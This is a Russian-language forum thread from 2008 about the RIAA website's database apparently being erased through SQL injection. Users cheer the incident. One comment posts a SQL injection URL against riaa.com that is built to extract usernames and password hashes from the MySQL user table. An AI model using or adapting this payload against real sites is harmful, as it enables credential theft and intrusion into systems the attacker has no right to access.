Сайт RIAA почищен "хакерами"

20-Янв-2008



С помощью простого "SQL injection" их пропаганда была успешно удалена с сайта.

Начало было положено на сайте Reddit(социальная сеть новостей), где была размещена ссылка на действительно замедляющий сервер SQL запрос. Пока пользователи Reddit пытались прекратить деятельность сервера,по некоторым утверждениям кто-то, определённо, внёс свою лепту и потёр всю базу данных.

До сих пор комментарии на Reddit ведутся только в форме обсуждения, в полуанонимной форме (имена авторов комментариев не имеют ссылок), поэтому невозможно установить их принадлежность, так же как и тех, кто мог бы найти другой способ удалить контент с сайта RIAA.

Так же, возможно, что в RIAA сами удалили контент на время устранения неполадок. Это маловероятно- отключать базу данных лучшее решение при большой проблеме с базой данных. В то время как данную уязвимость можно отладить за несколько секунд. изолированная проблема- не решение.



До сих пор всё выгдядело так, как будто контент стёрт со стартовой страницы RIAA. Будем надеятся что у них есть резервные копии, или не будем.

Пустой сайт RIAA



источник

 

свободу попугаям!! ))

Code:

http://riaa.com/newsitem.php?news_year_filter=&resultpage=&id=9AF90AF0-AA13-82A2-E693-D777D72F6B1C'+and+1=-1+union+select+1,2,3,4,concat_ws(0x3a,password,user),6,7,8,9+from+mysql.user+limit+0,1/*

 

ужос...начало конца?=)

 

Хорошая новость. Ненавижу riaa

 

первый раз в жизни увидел этот сайт

 

риа не пройдёд ! гипер война началась =/

 

+1 кто это такие? чо даж не влом было..